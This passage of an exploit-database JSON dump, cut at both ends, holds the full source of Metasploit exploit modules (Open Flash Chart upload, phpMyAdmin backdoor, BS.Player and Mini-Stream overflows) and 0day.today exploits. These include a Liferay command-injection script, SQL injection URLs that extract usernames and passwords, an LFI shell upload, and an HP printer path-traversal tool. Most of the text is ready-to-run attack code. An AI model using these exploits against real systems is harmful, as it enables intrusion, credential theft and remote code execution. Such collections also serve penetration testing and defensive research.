Msf::Exploit::FileDropper\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Open Flash Chart v2 Arbitrary File Upload\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Open Flash\n Chart version 2. 
Attackers can abuse the 'ofc_upload_image.php' file\n in order to upload and execute malicious PHP files.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Braeden Thomas', # Initial discovery + Piwik PoC\n 'Gjoko Krstic <gjoko[at]zeroscience.mk>', # OpenEMR PoC\n 'Halim Cruzito', # zonPHP PoC\n 'bcoles' # Metasploit\n ],\n 'References' =>\n [\n ['BID', '37314'],\n ['CVE', '2009-4140'],\n ['OSVDB', '59051'],\n ['EDB', '10532'],\n ['WPVDB', '6787'],\n ['WPVDB', '6788'],\n ['WPVDB', '6789'],\n ['WPVDB', '6790'],\n ['WPVDB', '6791'],\n ['WPVDB', '6792']\n ],\n 'Payload' =>\n {\n 'Space' => 8190, # Just a big value, injection on HTTP POST\n 'DisableNops' => true,\n 'BadChars' => \"\\x00\"\n },\n 'Arch' => ARCH_PHP,\n 'Platform' => 'php',\n 'Targets' =>\n [\n # Tested on:\n # * open-flash-chart v2-Lug-Wyrm-Charmer\n # set TARGETURI /php-ofc-library/\n # * open-flash-chart v2-beta-1\n # set TARGETURI /php-ofc-library/\n # * zonPHP v2.25\n # set TARGETURI /zonPHPv225/ofc/\n # * Piwik v0.4.3\n # set TARGETURI /piwik/libs/open-flash-chart/php-ofc-library/\n # * OpenEMR v4.1.1\n # set TARGETURI /openemr-4.1.1/library/openflashchart/php-ofc-library/\n [ 'Generic (PHP Payload)', {} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Dec 14 2009',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to Open Flash Chart', '/php-ofc-library/'])\n ])\n end\n\n #\n # Check for ofc_upload_image.php\n #\n def check\n print_status(\"Sending check\")\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, \"ofc_upload_image.php\"),\n })\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n elsif res.code.to_i == 404\n vprint_error(\"No ofc_upload_image.php found\")\n elsif res and res.code == 200 and res.body =~ /Saving your image to/\n vprint_status(\"Found ofc_upload_image.php\")\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Safe\n 
end\n\n def exploit\n\n # Upload\n @fname = \"#{rand_text_alphanumeric(rand(10)+6)}.php\"\n print_status(\"Uploading '#{@fname}' (#{payload.encoded.length} bytes)...\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'ofc_upload_image.php'),\n 'ctype' => \"\",\n 'vars_get' => { 'name' => \"#{@fname}\" },\n 'data' => \"<?php #{payload.encoded} ?>\"\n })\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No ofc_upload_image.php found\")\n elsif res.body =~ /can't write file/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write '#{@fname}'\")\n elsif res.body =~ /Saving your image to: (.+)#{@fname}/\n path = $1\n register_files_for_cleanup(@fname)\n print_status(\"Executing '#{path}#{@fname}'\")\n else\n fail_with(Failure::NotVulnerable, \"#{peer} - File wasn't uploaded, aborting!\")\n end\n\n # Execute\n res = send_request_raw({\n 'uri' => normalize_uri(target_uri.path, path, @fname)\n })\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{@fname}\")\n end\n\n end\nend\n\n#\n# Source\n#\n=begin ofc_upload_image.php\n20-// default path for the image to be stored //\n21-$default_path = '../tmp-upload-images/';\n\n23-if (!file_exists($default_path)) mkdir($default_path, 0777, true);\n\n25-// full path to the saved image including filename //\n26-$destination = $default_path . basename( $_GET[ 'name' ] );\n\n28-echo 'Saving your image to: '. 
$destination;\n\n39-$jfh = fopen($destination, 'w') or die(\"can't open file\");\n40-fwrite($jfh, $HTTP_RAW_POST_DATA);\n41-fclose($jfh);\n=end\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb"}, {"lastseen": "2019-12-04T09:44:50", "bulletinFamily": "exploit", "description": "This module exploits an arbitrary code execution backdoor placed into phpMyAdmin v3.5.2.2 through a compromised SourceForge mirror.\n", "modified": "2017-07-24T13:26:21", "published": "2012-09-25T15:47:30", "id": "MSF:EXPLOIT/MULTI/HTTP/PHPMYADMIN_3522_BACKDOOR", "href": "", "type": "metasploit", "title": "phpMyAdmin 3.5.2.2 server_sync.php Backdoor", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'phpMyAdmin 3.5.2.2 server_sync.php Backdoor',\n 'Description' => %q{\n This module exploits an arbitrary code execution backdoor\n placed into phpMyAdmin v3.5.2.2 through a compromised SourceForge mirror.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2012-5159' ],\n [ 'OSVDB', '85739' ],\n [ 'EDB', '21834' ],\n [ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php' ]\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'ConnectionType' => 'find',\n },\n # Arbitrary big number. 
The payload gets sent as an HTTP\n # response body, so really it's unlimited\n 'Space' => 262144, # 256k\n },\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 30\n },\n 'DisclosureDate' => 'Sep 25 2012',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [[ 'Automatic', { }]],\n 'DefaultTarget' => 0))\n\n register_options([\n OptString.new('PATH', [ true , \"The base directory containing phpMyAdmin try\", '/phpMyAdmin'])\n ])\n end\n\n def exploit\n\n uris = []\n\n tpath = datastore['PATH']\n if tpath[-1,1] == '/'\n tpath = tpath.chop\n end\n\n pdata = \"c=\" + Rex::Text.to_hex(payload.encoded, \"%\")\n\n res = send_request_raw( {\n 'global' => true,\n 'uri' => tpath + \"/server_sync.php\",\n 'method' => 'POST',\n 'data' => pdata,\n 'headers' => {\n 'Content-Type' => 'application/x-www-form-urlencoded',\n 'Content-Length' => pdata.length,\n }\n }, 1.0)\n\n handler\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb"}, {"lastseen": "2019-11-29T09:40:17", "bulletinFamily": "exploit", "description": "This module exploits a buffer overflow in BS.Player 2.57. 
When the playlist import is used to import a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution.\n", "modified": "2017-07-24T13:26:21", "published": "2012-01-12T21:12:43", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/BSPLAYER_M3U", "href": "", "type": "metasploit", "title": "BS.Player 2.57 Buffer Overflow (Unicode SEH)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BS.Player 2.57 Buffer Overflow (Unicode SEH)',\n 'Description' => %q{\n This module exploits a buffer overflow in BS.Player 2.57. When\n the playlist import is used to import a specially crafted m3u file,\n a buffer overflow occurs allowing arbitrary code execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'C4SS!0 G0M3S ', # Original Exploit\n 'Chris Gabriel', # MSF Module\n #Greets: Corelan team for mona.py & awesome tutorials\n ],\n 'References' =>\n [\n [ 'OSVDB', '82528' ],\n [ 'EDB', '15934' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n #'InitialAutoRunScript' => 'migrate -f',\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'Space' => 2000,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x1a\\x80\",\n 'DisableNops' => true,\n 'StackAdjustment' => -3500,\n },\n\n 'Targets' =>\n [\n [ 'Windows XP',\n {\n # pop ecx # pop ebp # ret 0c\n # ASLR: False, Rebase: False, SafeSEH: False\n # v2.5.7.1051 (bsplayer.exe)\n 'Ret' => \"\\x2f\\x49\",\n 'Offset' => 4102,\n 'Padding' => 1879\n }\n ],\n [ 'Windows 7',\n {\n # pop ecx # pop ebp # ret 0c\n # ASLR: False, Rebase: False, SafeSEH: False\n # v2.5.7.1051 (bsplayer.exe)\n 'Ret' => \"\\x2f\\x49\",\n 'Offset' => 4102,\n 'Padding' => 1931\n }\n ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Jan 07 
2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),\n ])\n\n end\n\n def exploit\n\n nseh = \"\\x61\\x42\"\n\n align = ''\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x50\"\t# PUSH EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\xc3\"\t# RET\n\n enc = framework.encoders.create('x86/unicode_mixed')\n register_to_align_to = \"EAX\"\n enc.datastore.import_options_from_hash({ 'BufferRegister' => register_to_align_to })\n unicodepayload = enc.encode(payload.encoded, nil, nil, platform)\n\n padding = rand_text_alpha_lower(target['Padding'])\n\n buffer = \"http://\"\n buffer << rand_text_alpha_lower(target['Offset'])\n buffer << nseh\n buffer << target['Ret']\n buffer << align\n buffer << padding\n buffer << unicodepayload\n\n file_create(buffer)\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/bsplayer_m3u.rb"}, {"lastseen": "2019-11-21T21:02:17", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1 By creating a specially crafted pls file, an attacker may be able to execute arbitrary 
code.\n", "modified": "2017-09-14T02:03:34", "published": "2011-11-04T08:20:43", "id": "MSF:EXPLOIT/WINDOWS/MISC/MINI_STREAM", "href": "", "type": "metasploit", "title": "Mini-Stream 3.0.1.1 Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Mini-Stream 3.0.1.1 Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1\n By creating a specially crafted pls file, an attacker may be able\n to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # CORELAN Security Team\n 'Ron Henry <rlh[at]ciphermonk.net>', # dijital1; Return address update\n ],\n 'References' =>\n [\n [ 'CVE', '2009-5109'],\n [ 'OSVDB', '61341' ],\n [ 'EDB', '10745' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 3500,\n 'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\\x26\\x3d\\x2b\\x3f\\x3a\\x3b\\x2d\\x2c\\x2f\\x23\\x2e\\x5c\\x30\",\n 'StackAdjustment' => -3500\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [\n 'Windows XP SP3 ENG',\n {\n 'Ret' => 0x7e429353, # 0x7e429353 JMP ESP - USER32.dll\n 'Offset' => 17417\n }\n ],\n [\n 'Windows XP SP2 ENG',\n {\n 'Ret' => 0x7c941eed, # 0x7c941eed JMP ESP - SHELL32.dll\n 'Offset' => 17417\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Dec 25 2009',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('URIPATH', [ true, 'The URI to use for this exploit', 'msf.pls'])\n ])\n end\n\n\n def on_request_uri(cli, request)\n # Calculate the correct offset\n host = (datastore['SRVHOST'] == '0.0.0.0') ? 
Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\n host << \":#{datastore['SRVPORT']}/\"\n offset = target['Offset'] - host.length\n\n # Construct our buffer\n sploit = rand_text_alpha(offset)\n sploit << [target.ret].pack('V')\n sploit << make_nops(32)\n sploit << @p\n\n print_status(\"Sending malicous payload\")\n send_response(cli, sploit, {'Content-Type'=>'application/pls+xml'})\n end\n\n def exploit\n @p = payload.encoded\n super\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/mini_stream.rb"}], "zdt": [{"lastseen": "2018-03-09T16:07:50", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2014-12-30T00:00:00", "published": "2014-12-30T00:00:00", "id": "1337DAY-ID-23043", "href": "https://0day.today/exploit/description/23043", "type": "zdt", "title": "Liferay Portal 7.0.x <= 7.0.2 - Pre-Auth RCE Exploit", "sourceData": "#!/bin/sh\r\n \r\n# Exploit title: Liferay Portal 7.0 RCE\r\n# Date: 11/16/2014\r\n# Exploit author: drone (@dronesec)\r\n# Vendor homepage: http://www.liferay.com/\r\n# Software link: http://downloads.sourceforge.net/project/lportal/Liferay%20Portal/7.0.0%20M2/liferay-portal-tomcat-7.0-ce-m2-20141017162509960.zip\r\n# Version: 7.0.0/7.0.1/7.0.2\r\n# Fixed in: 7.0.3\r\n# Tested on: Windows 7\r\n \r\n# Pre-auth command injection using an exposed Apache Felix,\r\n# exposed by default on all Liferay Portal 7.0 installs.\r\n#\r\n# ./liferay_portal7.sh 192.168.1.1 \"cmd.exe /C calc.exe\"\r\n#\r\n \r\n \r\n(echo open $1 11311\r\nsleep 1\r\necho system:getproperties\r\nsleep 1\r\necho exec \\\"$2\\\"\r\nsleep 1\r\n) | telnet\n\n# 0day.today [2018-03-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/23043"}, {"lastseen": "2018-04-12T03:52:27", "bulletinFamily": "exploit", "description": "Exploit for 
php platform in category web applications", "modified": "2012-07-10T00:00:00", "published": "2012-07-10T00:00:00", "id": "1337DAY-ID-18946", "href": "https://0day.today/exploit/description/18946", "type": "zdt", "title": "Wordpress Plugins - WP-Predict v1.0 Blind SQL Injection", "sourceData": "# Exploit Title: WordPress WP-Predict v1.0 Blind SQL Injection\r\n# Date: 7/9/12\r\n# Exploit Author: Chris Kellum\r\n# Vendor Homepage: http://www.pootlepress.co.uk/\r\n# Software Link: http://downloads.wordpress.org/plugin/wp-predict.zip\r\n# Version: 1.0\r\n \r\n \r\n \r\n=====================\r\nVulnerability Details\r\n=====================\r\n \r\nPredictId parameter in post request is vulnerable to blind SQL injection.\r\n \r\n===============\r\nTesting Details\r\n===============\r\n \r\nWhen attempting follow-up submissions, the plugin states that you've already voted. This can easily be circumvented by using your browser's back button.\r\n \r\n=================\r\nInjection Example\r\n=================\r\n \r\nUsing Burp Suite or other proxy, intercept the post request when submitting your answer and append and 1=1 to the predictId parameter before forwarding:\r\n \r\npredictSelection=1&predictId=1 and 1=1&postAction=submitVote&submitVote.x=70&submitVote.y=26\r\n \r\nIn the example above, the statement evaluates to true and the vote count increases by 1.\r\n \r\nSending a new request with \"predictId=1 and 1=0\" will not increase the vote count.\r\n\r\n\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18946"}, {"lastseen": "2018-01-06T01:04:34", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2011-08-07T00:00:00", "published": "2011-08-07T00:00:00", "id": "1337DAY-ID-16622", "href": "https://0day.today/exploit/description/16622", "type": "zdt", "title": "Cart Software Multiple Vulnerabilities", "sourceData": "# Exploit Title: 
sabadkharid CMS Multiple Vulnerabilities\r\n# Date: 8/07/2011\r\n# Author: hosinn\r\n# Software Link: http://www.sabadkharid.com\r\n# Version: professional edition\r\n# Platform / Tested on: Multiple\r\n# Category: webapplications\r\n# Code : N/A\r\n# Download Video: http://hosinn.persiangig.com/video/sabadkharid.rar\r\n# BUG Sql Injectin : ###############################################################\r\n \r\n1 > cart.php have sql injection bug .\r\n \r\n2 > go to http://target.com/cart.php?shopping_cart&add2cart=10'\r\n \r\n \r\n# Expolite : #######################################################################\r\n \r\n1 > get version => http://site.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select (select @@version) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/\r\n \r\n2 > get username => http://site.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select (select login) from SKH_customers limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/\r\n \r\n > output like 'admin1' and username:admin\r\n \r\n3 > get password => http://site.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select (select cust_password) from SKH_customers limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/\r\n \r\n > output like 'pass1' and username:pass\r\n \r\n4 > Then Login To Site\r\n \r\n# BUG LFI : ######################################################################\r\n \r\n1 > Go To Http://site.com/admin.php\r\n \r\n2 > Go To Http://site.com/admin.php?tab=conf\u00e2\u0160\u201a=template&edit=../../../cart.php\r\n \r\n3 > Then Copy Your Shell script & Save\r\n \r\n4 > Find Your Shell in Http://site.com/cart.php\r\n \r\n \r\n#############################################################################\r\nOur Website : 
http://www.nopotm.ir\r\nSpecial Thanks to : H-SK33PY , Immortal Boy , BigB4NG , N3td3v!l ,\r\nBlacksun , Drosera^Cqq47 , NOPO , zilli0o0n & all iranian NOPO members\r\n#############################################################################\r\n\r\n\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/16622"}, {"lastseen": "2018-03-02T23:43:49", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category remote exploits", "modified": "2011-08-07T00:00:00", "published": "2011-08-07T00:00:00", "id": "1337DAY-ID-16623", "href": "https://0day.today/exploit/description/16623", "type": "zdt", "title": "HP JetDirect PJL Interface Universal Path Traversal", "sourceData": "# Exploit Title: HP JetDirect PJL Interface Universal Path Traversal\r\n# Date: Aug 7, 2011\r\n# Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/>\r\n# Software Link: http://www.hp.com\r\n# Version: All\r\n# Tested on: HP LaserJet Pxxxx Series\r\n \r\n##\r\n# $Id: $\r\n##\r\n \r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\n \r\n##\r\n# Sample Output:\r\n#\r\n#\r\n# msf auxiliary(hp_printer_pjl_traversal) > show options\r\n#\r\n# Module options (auxiliary/admin/hp_printer_pjl_traversal):\r\n#\r\n# Name Current Setting Required Description\r\n# ---- --------------- -------- -----------\r\n# INTERACTIVE false no Enter interactive mode [msfconsole Only]\r\n# RHOST 202.138.16.21 yes The target address\r\n# RPATH / yes The remote filesystem path to browse or read\r\n# RPORT 9100 yes The target port\r\n#\r\n#\r\n# msf auxiliary(hp_printer_pjl_traversal) > run\r\n#\r\n# [*] cd / ...\r\n# [+] Server returned the following response:\r\n#\r\n# . TYPE=DIR\r\n# .. 
TYPE=DIR\r\n# bin TYPE=DIR\r\n# usr TYPE=DIR\r\n# etc TYPE=DIR\r\n# hpmnt TYPE=DIR\r\n# hp TYPE=DIR\r\n# lib TYPE=DIR\r\n# dev TYPE=DIR\r\n# init TYPE=FILE SIZE=9016\r\n# .profile TYPE=FILE SIZE=834\r\n# tmp TYPE=DIR\r\n#\r\n#\r\n# msf auxiliary(hp_printer_pjl_traversal) > set INTERACTIVE true\r\n# INTERACTIVE => true\r\n# msf auxiliary(hp_printer_pjl_traversal) > set RPATH /hp\r\n# RPATH => /hp\r\n# msf auxiliary(hp_printer_pjl_traversal) > run\r\n#\r\n# [*] Entering interactive mode ...\r\n# [*] cd /hp ...\r\n# [+] Server returned the following response:\r\n#\r\n# . TYPE=DIR\r\n# .. TYPE=DIR\r\n# app TYPE=DIR\r\n# lib TYPE=DIR\r\n# bin TYPE=DIR\r\n# webServer TYPE=DIR\r\n# images TYPE=DIR\r\n# DemoPage TYPE=DIR\r\n# loc TYPE=DIR\r\n# AsianFonts TYPE=DIR\r\n# data TYPE=DIR\r\n# etc TYPE=DIR\r\n# lrt TYPE=DIR\r\n#\r\n# [*] Current RPATH: /hp\r\n# [*] -> 'quit' to exit\r\n# [*] ->'/' to return to file system root\r\n# [*] ->'..' to move up to one directory\r\n# [*] ->'!r FILE' to read FILE on current directory\r\n#\r\n# [*] Enter RPATH:\r\n# $ > webServer/config\r\n# [*] cd /hp/webServer/config ...\r\n# [+] Server returned the following response:\r\n#\r\n# . TYPE=DIR\r\n# .. TYPE=DIR\r\n# soe.xml TYPE=FILE SIZE=23615\r\n# version.6 TYPE=FILE SIZE=45\r\n#\r\n#\r\n# [*] Current RPATH: /hp/webServer/config\r\n# [*] -> 'quit' to exit\r\n# [*] ->'/' to return to file system root\r\n# [*] ->'..' to move up to one directory\r\n# [*] ->'!r FILE' to read FILE on current directory\r\n#\r\n# [*] Enter RPATH:\r\n# $ > !r version.6\r\n# [*] cat /hp/webServer/config/version.6 ...\r\n# [+] Server returned the following response:\r\n#\r\n# WebServer directory version. Do not delete!\r\n#\r\n#\r\n# [*] Current RPATH: /hp/webServer/config\r\n# [*] -> 'quit' to exit\r\n# [*] ->'/' to return to file system root\r\n# [*] ->'..' to move up to one directory\r\n# [*] ->'!r FILE' to read FILE on current directory\r\n#\r\n# [*] Enter RPATH:\r\n# $ > quit\r\n# [*] Exited ... 
Have fun with your Printer!\r\n# [*] Auxiliary module execution completed\r\n \r\n \r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Auxiliary\r\n \r\n include Msf::Exploit::Remote::Tcp\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'HP JetDirect PJL Interface Universal Path Traversal',\r\n 'Version' => '$Revision: 1 $',\r\n 'Description' => %q{\r\n This module exploits path traveresal issue in possibly all HP network-enabled printer series, especially those which enable Printer Job Language (aka PJL) command interface through the default JetDirect port 9100.\r\n With the decade-old dot-dot-slash payloads, the entire printer file system can be accessed or modified.\r\n },\r\n 'Author' => [\r\n 'Moritz Jodeit <http://www.nruns.com/>', # Bug Discoverer\r\n 'Myo Soe <YGN Ethical Hacker Group, http://yehg.net/>' # Metasploit Module \r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2010-4107' ],\r\n [ 'URL', 'http://www.nruns.com/_downloads/SA-2010%20003-Hewlett-Packard.pdf' ], \r\n [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02004333' ], \r\n [ 'URL', 'http://www.irongeek.com/i.php?page=security/networkprinterhacking' ],\r\n [ 'URL', 'https://github.com/urbanadventurer/WhatWeb/blob/master/plugins/HP-laserjet-printer.rb' ],\r\n [ 'URL', 'https://github.com/urbanadventurer/WhatWeb/blob/master/plugins/HP-OfficeJet-Printer.rb' ],\r\n [ 'URL', 'http://core.yehg.net/lab/#tools.exploits' ]\r\n ],\r\n 'DisclosureDate' => '2010-11-15'))\r\n \r\n register_options(\r\n [\r\n \r\n OptString.new('RPATH',\r\n [\r\n true,\r\n \"The remote filesystem path to browse or read\",\r\n \"/\"\r\n ]\r\n ),\r\n OptBool.new('INTERACTIVE',\r\n [\r\n false,\r\n \"Enter interactive mode [msfconsole Only]\",\r\n false\r\n ]\r\n ),\r\n \r\n Opt::RPORT(9100)\r\n ],self.class)\r\n \r\n \r\n end\r\n \r\n def run\r\n mode = datastore['INTERACTIVE']\r\n \r\n if mode == true\r\n 
set_interactive(datastore['RPATH'])\r\n else\r\n set_onetime(datastore['RPATH'])\r\n end\r\n end\r\n \r\n def set_interactive(spath)\r\n action = 'DIR'\r\n rpath = spath\r\n rfpath = ''\r\n tmp_path = ''\r\n tmp_file = ''\r\n cur_dir = '/'\r\n \r\n print_status(\"Entering interactive mode\")\r\n stop = false\r\n \r\n set_onetime(rpath)\r\n \r\n until stop == true \r\n print_status(\"Current RPATH: #{rpath}\")\r\n print_status(\"-> 'quit' to exit\")\r\n print_status(\"->'/' to return to file system root\")\r\n print_status(\"->'..' to move up to one directory\")\r\n print_status(\"->'!r FILE' to read FILE on current directory\\r\\n\")\r\n print_status(\"Enter RPATH:\")\r\n print(\"$ > \")\r\n \r\n tmp_path = gets.chomp.to_s \r\n \r\n \r\n if tmp_path =~ /\\.\\./ && rpath.length > 2\r\n old_path = rpath\r\n new_path = rpath[0,rpath.rindex('/')]\r\n if new_path != nil\r\n rpath = new_path\r\n else\r\n rpath = '/'\r\n end\r\n rpath = '/' if rpath.length == 0\r\n print_status(\"Change to one up directory: #{rpath}\")\r\n elsif tmp_path =~ /\\!r\\s/ \r\n cur_dir = rpath\r\n tmp_file = tmp_path.gsub('!r ','')\r\n rfpath = cur_dir + '/' + tmp_file\r\n rfpath = rfpath.gsub('//','/') \r\n action = 'FILE'\r\n \r\n elsif tmp_path == '/'\r\n rpath = '/'\r\n elsif rpath != '/'\r\n rpath = rpath + '/' << tmp_path\r\n else\r\n rpath = rpath << tmp_path\r\n end\r\n if rpath =~ /quit/\r\n stop= true\r\n rpath = '/'\r\n print_status(\"Exited ... 
Have fun with your Printer!\")\r\n else\r\n rpath = rpath.gsub('//','/') \r\n if action == 'FILE'\r\n set_onetime(rfpath,action)\r\n cur_dir = rpath\r\n else\r\n set_onetime(rpath,action)\r\n end\r\n action = 'DIR' \r\n end\r\n end\r\n end\r\n \r\n def set_onetime(spath,saction = datastore['ACTION'])\r\n \r\n rpathx = spath\r\n action = saction\r\n rpathx = '/' if rpathx =~ /\\/quit/\r\n \r\n connect\r\n \r\n dir_cmd = \"\\x1b%[email\u00a0protected] FSDIRLIST NAME=\\\"0:/../../../[REPLACE]\\\" ENTRY=1 COUNT=99999999\\x0d\\x0a\\x1b%-12345X\\x0d\\x0a\"\r\n file_cmd = \"\\x1b%[email\u00a0protected] FSUPLOAD NAME=\\\"0:/../../../[REPLACE]\\\" OFFSET=0 SIZE=99999999\\x0d\\x0a\\x1b%-12345X\\x0d\\x0a\"\r\n \r\n if action =~ /DIR/\r\n r_cmd = dir_cmd.sub(\"[REPLACE]\",rpathx)\r\n print_status(\"cd #{rpathx} ...\")\r\n else\r\n r_cmd = file_cmd.sub(\"[REPLACE]\",rpathx)\r\n print_status(\"cat #{rpathx} ...\") \r\n end\r\n \r\n \r\n \r\n recv = sock.put(r_cmd)\r\n res = sock.get(-1,1)\r\n \r\n if (!res)\r\n print_error(\"ERROR in receiving data!\\r\\n\")\r\n else\r\n if res.to_s =~ /ERROR/\r\n print_error(\"Operation Not Permitted or File/DIR Not Found!\\r\\n\")\r\n disconnect\r\n return\r\n end\r\n resx = res.to_s[res.index(\"\\r\\n\")+1,res.length]\r\n print_good(\"Server returned the following response:\\r\\n#{resx}\")\r\n end\r\n \r\n disconnect \r\n \r\n end\r\n \r\n \r\nend\r\n\r\n\n\n# 0day.today [2018-03-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/16623"}, {"lastseen": "2018-04-08T01:47:24", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2011-07-09T00:00:00", "published": "2011-07-09T00:00:00", "id": "1337DAY-ID-16503", "href": "https://0day.today/exploit/description/16503", "type": "zdt", "title": "phpMyAdmin 3.x Swekey Remote Code Injection Exploit", "sourceData": "<?php /*\r\n# Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit\r\n# 
